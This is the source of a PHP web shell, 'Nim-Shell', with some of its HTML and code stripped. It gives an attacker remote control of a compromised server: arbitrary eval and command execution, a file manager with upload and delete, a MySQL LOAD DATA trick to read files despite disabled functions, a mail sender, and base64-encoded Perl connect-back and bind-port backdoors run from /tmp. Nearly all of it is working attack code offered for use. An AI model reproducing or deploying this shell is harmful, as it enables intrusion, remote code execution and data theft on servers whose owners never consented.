..:: Nim-Shell ::..

Nim-Shell

[ Shell ]-[ File Manager ]-[ Upload ]-[ Tools ]-[ Bind/CB ]-[ PHP Info ]-[ Bypass ]-[ Email Sender ]-[ About ]-[ Logout ]

OS :
Server :
Disable_Function :
Safe_Mode :
Shell Path :
Server :
Your IP :

ON (secure)"; echo $info; }else{ $safemode = false; $info = "OFF (not secure)"; echo $info; }?>

::: Total space : ::: Free space:

'; $df = ini_get("disable_functions"); if (!substr_count($df, 'readfile')){ if(@readfile($bypass)){ echo readfile($bypass); // ELSE ! ;) }else{echo 'Access Denied';} }else{ echo 'Sorry ! Disable Function'; } echo ''; }elseif(!empty($_POST['dblocation']) && !empty($_POST['dbusername']) && !empty($_POST['dbname']) ){ $file = $_POST['dblocation']; $dbname = $_POST['dbname']; $dbuser = $_POST['dbusername']; $dbpass = ''; @ $dbpass = $_POST['password']; $location = 'localhost'; @ $db = new mysqli ($location,$dbuser,$dbpass,$dbname); if (mysqli_connect_errno()) { echo 'Error Connect To DataBase'; } $query = "DROP TABLE $dbname.`bypass`" ; @ $result = $db->query($query); $query = "CREATE TABLE $dbname.`bypass` (`readfile` VARCHAR( 2048 ) NOT NULL);"; @ $result = $db->query($query); $query = "LOAD DATA LOCAL INFILE '$file' INTO TABLE $dbname.bypass"; @ $result = $db->query($query); $query = "select * from bypass"; @ $result = $db->query($query); $num_result = $result->num_rows; echo ''; for ($i=0 ; $i < $num_result ; $i++) { $row_group = $result->fetch_assoc(); $fileecho = $row_group['readfile']; echo htmlspecialchars($fileecho); } echo ''; }elseif(!empty($_POST['eval'])){ $commmandeval = $_POST['eval']; eval("$commmandeval"); }else{ echo '

Readfile()	SQL	Eval
File Name	File Name : UserName : Password : DB Name :	F.ex : echo \'ZAC003\';

'; } break; case 'email': if (!empty($_POST['yname']) && !empty($_POST['yemail']) && !empty($_POST['to']) && !empty($_POST['subject']) && !empty($_POST['text'])) { $name = $_POST['yname']; $email = $_POST['yemail'] ; $to = $_POST['to']; $subject = $_POST['subject']; $text = nl2br($_POST['text']); $from_A = "From: $name \r\n"; if (@ mail($email,$subject,$text,$from_A)) { echo 'Email Send ...'; }else{ echo 'Email not Send ...'; } } echo ''; break; case 'shell': if (!empty($_POST['cmd'])) { $command = $_POST['cmd']; echo ''; } break; case 'upload': echo "

File:
Addres:	IS Copy() !

"; echo "

URL:
Addres:	IS Copy() !

"; if (isset($_POST['path'])){ if ($_POST['ac'] == 'upload') { $uploadfile = $_POST['path'].$_FILES['file']['name']; if ($_POST['path']==""){ $uploadfile = $_FILES['file']['name']; } if (@copy($_FILES['file']['tmp_name'], $uploadfile)){ echo " upload $uploadfile
"; echo "File" .$_FILES['file']['name']. "
"; echo "Size:" .$_FILES['file']['size']. "
"; } else { print "please select File:
"; print_r($_FILES); } }elseif($_POST['ac'] == 'copy'){ $remotefile = $_POST['file']; $filetype = $_POST['path']; if (copy($remotefile,$filetype)) { print "Complete Copy File ($filetype) !
"; }}} break; case 'tools': echo 'The Best Webbase Hackning Tools : Here '; break; case 'cb': if (!empty($_POST['ipphp']) && !empty($_POST['portphp'])){ $ip=$_POST['ipphp']; $port=$_POST['portphp']; @$fp=fsockopen($ip , $port , $errno, $errstr); if (!$fp){ $result = "Error: Could not open socket connection"; }else{ $server = $_SERVER["SERVER_SOFTWARE"]; $uname = PHP_UNAME(); $mass =" !..:: NIM-Shell ::..!\n-----------------------------------------------------------\nUname : $uname\nServer : $server\nVirangar UnderGround Team , Aria Security Team , WhiteHat Nomads Group , Pares Security Team\nAnd All Iranian Young Hacker ;)\n-----------------------------------------------------------\n"; @ fputs ($fp ,"$mass"); while(!feof($fp)){ @ fputs ($fp," Shell->$ "); $result= fgets ($fp, 4096); $message = $result; $df = ini_get("disable_functions"); if (!substr_count($df, 'shell_exec')){ $message = shell_exec($message); @ fputs ($fp,"-----------------------------------------------------------\n".$message."\n-----------------------------------------------------------\n"); }else{ echo "sorry , Can't be executed For Connect Back"; } } fclose ($fp); }}elseif(!empty($_POST['ipperl']) && !empty($_POST['portperl'])){ $ip=$_POST['ipperl']; $port=$_POST['portperl']; $cbperl_win = base64_decode("dXNlIElPOjpTb2NrZXQ7DQokc3lzdGVtCT0gJ2NtZC5leGUnOw0KJEFSR0M9QEFSR1Y7IA0KaWYgKCRBUkdDIT0yKSB7IA0KICAgcHJpbnQgIlVzYWdlOiBjYi5wbCBbSG9zdF0gW1BvcnRdIFxuIjsgDQogICBkaWUgIkYuZXg6IGNiLnBsICAxMjcuMC4wLjEgMTM3MCBcbiI7IA0KfSANCnVzZSBTb2NrZXQ7IA0KdXNlIEZpbGVIYW5kbGU7IA0Kc29ja2V0KFNPQ0tFVCwgUEZfSU5FVCwgU09DS19TVFJFQU0sIGdldHByb3RvYnluYW1lKCd0Y3AnKSkgb3IgZGllIHByaW50ICJbLV0gQ291bGQgTm90IENvbnZlcnQgSG9zdCBOYW1lXG4iOyANCmNvbm5lY3QoU09DS0VULCBzb2NrYWRkcl9pbigkQVJHVlsxXSwgaW5ldF9hdG9uKCRBUkdWWzBdKSkpIG9yIGRpZSBwcmludCAiWy1dIENvdWxkIE5vdCBDMG5uM2N0IDIgSG9zdFxuIjsgDQpwcmludCAiWytdIFJlc2xvdmluZyBIb3N0IDxicj4iOyANCnByaW50ICJbK10gQ29ubmVjdGluZy4uLiAkQVJHVlswXSA8YnI+IjsgDQpwcmludCAiWytdIENvbm5lY3RlZCB0byByZW1vdGUgaG9zdCA8YnI+IjsNCnByaW50ICJbK10gU3dhcHBpbmcgU2hlbGwgPGJyPiI7DQpwcmludCAiWytdIFlvdXIgR2V0IEFjY2VzcyA8YnI+IjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7IA0Kb3BlbihTVERJTiwgIj4mU09DS0VUIik7IA0Kb3BlbihTVERPVVQsIj4mU09DS0VUIik7IA0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7IA0KcHJpbnQgIlxuXG4gIAkJIS4uOjogTklNLVNoZWxsIDo6Li4hXG4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuVmlyYW5nYXIgVW5kZXJHcm91bmQgVGVhbSAsIEFyaWEgU2VjdXJpdHkgVGVhbSAsIFdoaXRlSGF0IE5vbWFkcyBHcm91cCAsIFBhcmVzIFNlY3VyaXR5IFRlYW1cbkFuZCBBbGwgSXJhbmlhbiBZb3VuZyBIYWNrZXIgOylcbi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tXG4iOzsgDQpzeXN0ZW0oJHN5c3RlbSk7"); $cbperl_linux = base64_decode("dXNlIElPOjpTb2NrZXQ7DQokc3lzdGVtCT0gJy9iaW4vc2gnOw0KJEFSR0M9QEFSR1Y7IA0KaWYgKCRBUkdDIT0yKSB7IA0KICAgcHJpbnQgIlVzYWdlOiBjYi5wbCBbSG9zdF0gW1BvcnRdIFxuIjsgDQogICBkaWUgIkYuZXg6IGNiLnBsICAxMjcuMC4wLjEgMTM3MCBcbiI7IA0KfSANCnVzZSBTb2NrZXQ7IA0KdXNlIEZpbGVIYW5kbGU7IA0Kc29ja2V0KFNPQ0tFVCwgUEZfSU5FVCwgU09DS19TVFJFQU0sIGdldHByb3RvYnluYW1lKCd0Y3AnKSkgb3IgZGllIHByaW50ICJbLV0gQ291bGQgTm90IENvbnZlcnQgSG9zdCBOYW1lXG4iOyANCmNvbm5lY3QoU09DS0VULCBzb2NrYWRkcl9pbigkQVJHVlsxXSwgaW5ldF9hdG9uKCRBUkdWWzBdKSkpIG9yIGRpZSBwcmludCAiWy1dIENvdWxkIE5vdCBDMG5uM2N0IDIgSG9zdFxuIjsgDQpwcmludCAiWytdIFJlc2xvdmluZyBIb3N0IDxicj4iOyANCnByaW50ICJbK10gQ29ubmVjdGluZy4uLiAkQVJHVlswXSA8YnI+IjsgDQpwcmludCAiWytdIENvbm5lY3RlZCB0byByZW1vdGUgaG9zdCA8YnI+IjsNCnByaW50ICJbK10gU3dhcHBpbmcgU2hlbGwgPGJyPiI7DQpwcmludCAiWytdIFlvdXIgR2V0IEFjY2VzcyA8YnI+IjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7IA0Kb3BlbihTVERJTiwgIj4mU09DS0VUIik7IA0Kb3BlbihTVERPVVQsIj4mU09DS0VUIik7IA0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7IA0KcHJpbnQgIlxuXG4gIAkJIS4uOjogTklNLVNoZWxsIDo6Li4hXG4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuVmlyYW5nYXIgVW5kZXJHcm91bmQgVGVhbSAsIEFyaWEgU2VjdXJpdHkgVGVhbSAsIFdoaXRlSGF0IE5vbWFkcyBHcm91cCAsIFBhcmVzIFNlY3VyaXR5IFRlYW1cbkFuZCBBbGwgSXJhbmlhbiBZb3VuZyBIYWNrZXIgOylcbi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tXG4iOzsgDQpzeXN0ZW0oJHN5c3RlbSk7"); @ $fp = fopen("/tmp/sess_nim-shell.sess","w+"); @ fwrite($fp,$cbperl_linux,strlen($cbperl_linux)); @ fclose($fp); $command = ("perl /tmp/sess_nim-shell.sess $ip $port"); $df = ini_get("disable_functions"); if (!substr_count($df, 'passthru')){ passthru($command); }elseif (!substr_count($df, 'system')){ system($command); }elseif (!substr_count($df, 'shell_exec')){ $shellcmd = shell_exec($command); echo $shellcmd; }else{ echo "sorry , Can't be ExEcUtEd "; } }elseif(!empty($_POST['portbackdoor']) ){ $port=$_POST['portbackdoor']; $cbperl_win = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokcG9ydCA9IDEzNzA7DQokcG9ydCA9ICRBUkdWWzBdIGlmICRBUkdWWzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NITER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJpbmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQp3aGlsZSgxKQ0Kew0KCWFjY2VwdChYLCBTKTsNCgl1bmxlc3MoZm9yaykNCgl7DQoJCW9wZW4gU1RESU4sICI8JlgiOw0KCQlvcGVuIFNURE9VVCwgIj4mWCI7DQoJCW9wZW4gU1RERVJSLCAiPiZYIjsNCgkJY2xvc2UgWDsNCgkJZXhlYygiY21kLmV4ZSIpOw0KCX0NCgljbG9zZSBYOw0KfQ0KcHJpbnQgIio9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Kjxicj4iOw0KcHJpbnQgIiogICAgICAgIC06IFpBQzAwMyBCaW5kIFBvcnQgOi0gICAgICAgICAgKjxicj4iOw0KcHJpbnQgIiogICBHcmVldHMgOiBBbGwgSXJhbmlhbiBIYWNrZXJzICAgICAgICAgKjxicj4iOw0KcHJpbnQgIiogICAgU3A0d05pbkcgU2hlTEwgMGYgcE9yVCA6IDEzNzAgICAgICAgKjxicj4iOw0KcHJpbnQgIio9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Kjxicj4iOw=="); $cbperl_linux = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokcG9ydCA9IDEzNzA7DQokcG9ydCA9ICRBUkdWWzBdIGlmICRBUkdWWzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NITER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJpbmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQp3aGlsZSgxKQ0Kew0KCWFjY2VwdChYLCBTKTsNCgl1bmxlc3MoZm9yaykNCgl7DQoJCW9wZW4gU1RESU4sICI8JlgiOw0KCQlvcGVuIFNURE9VVCwgIj4mWCI7DQoJCW9wZW4gU1RERVJSLCAiPiZYIjsNCgkJY2xvc2UgWDsNCgkJZXhlYygiL2Jpbi9zaCIpOw0KCX0NCgljbG9zZSBYOw0KfQ0KcHJpbnQgIio9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Kjxicj4iOw0KcHJpbnQgIiogICAgICAgIC06IFpBQzAwMyBCaW5kIFBvcnQgOi0gICAgICAgICAgKjxicj4iOw0KcHJpbnQgIiogICBHcmVldHMgOiBBbGwgSXJhbmlhbiBIYWNrZXJzICAgICAgICAgKjxicj4iOw0KcHJpbnQgIiogICAgU3A0d05pbkcgU2hlTEwgMGYgcE9yVCA6IDEzNzAgICAgICAgKjxicj4iOw0KcHJpbnQgIio9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Kjxicj4iOw=="); @ $fp = fopen("/tmp/sess_nim-shell-bd.sess","w+"); @ fwrite($fp,$cbperl_linux,strlen($cbperl_linux)); @ fclose($fp); $command = ("perl /tmp/sess_nim-shell-bd.sess $port"); $df = ini_get("disable_functions"); if (!substr_count($df, 'passthru')){ passthru($command); }elseif (!substr_count($df, 'system')){ system($command); }elseif (!substr_count($df, 'shell_exec')){ $shellcmd = shell_exec($command); echo $shellcmd; }else{ echo "sorry , Can't be ExEcUtEd "; } }else{ ?>

With PHP(Only PHP Function) :

With Perl (Very GOOD For ROOT) :

BackDoor With Perl :

'.$_POST['dir']; }else{ echo 'Connot Write In File ...'; } } } echo ''; exit(); } if(!empty($_GET['delete'])) { $frpath=$_GET['delete']; if (@is_dir($frpath)){ $matches = glob($frpath . '/*.*'); if (@is_array ( $matches ) ) { foreach ( $matches as $filename) { if (@unlink ($filename) && @rmdir("$frpath")) { echo "OK , Delete => $frpath "; }else { echo "Connot Delete => $frpath "; } } } }else{ if(@unlink ("$frpath")){ echo "OK , Delete => $frpath "; }else{ echo "Connot Delete => $frpath "; } } } if(!empty($_GET['dir']) && !empty($_POST['MAX_FILE_SIZE'])){ $rpath=$_GET['dir']; $uploadfile = $rpath."/" . $_FILES['userfile']['name']; if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) { echo "Upload File => $uploadfile"; } } $homedir=getcwd(); $dir=@realpath($_GET['dir'])."/"; echo "

Shell PaTh : $homedir

"; echo "

"; if (@is_dir($dir)){ if (@ $dh=opendir($dir)){ while (($file = readdir($dh)) !== false) { $fsize=@round(@filesize($dir . $file)/1024); echo " "; } closedir($dh); }} echo "

File / Folder Name	Size KByte	Download	Edit	Chmod	Delete
"; if (@is_dir($dir.$file)) { echo " $file [DIR]"; } else { echo " $file "; } echo "	"; if (@is_file($dir.$file)) { echo "$fsize KB"; } else { echo " "; } echo "	"; if (@is_file($dir.$file)){ if (@is_readable($dir.$file)){ echo "[Download]"; }else { echo "No Readable"; } }else { echo " "; } echo "	"; if (@is_file($dir.$file)) { if (@is_readable($dir.$file)){ echo "[Edit]"; }else { echo "No Readable"; } }else { echo " "; } echo "	"; if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { echo "Dont in windows"; } else { echo "Chmod"; } echo "	[Delete]

"; break; case 'about': echo '

class about {

Name("AmIn SaKi"),alias("ZAC003"));

Age(17.5);

WebSite("http://zac003.a20.ir");

Email("ZAC003[at]Y!,MSN[dot]CoM");

Greets("The-Outl4w , Aura , Sc0rpion(YaShAr) , Mormoroth , Black.Shadows , Hadi_hadi ZeDhAl And All Member of Aria-Security.Com AnD Virangar.NeT");

}

';break; }}?>

Writed By ZAC003
[ WhiteHat Nomads Group ]-[ Aria Security Team ]-[ Virangar UnderGround Team ]-[ Parse Security Team ]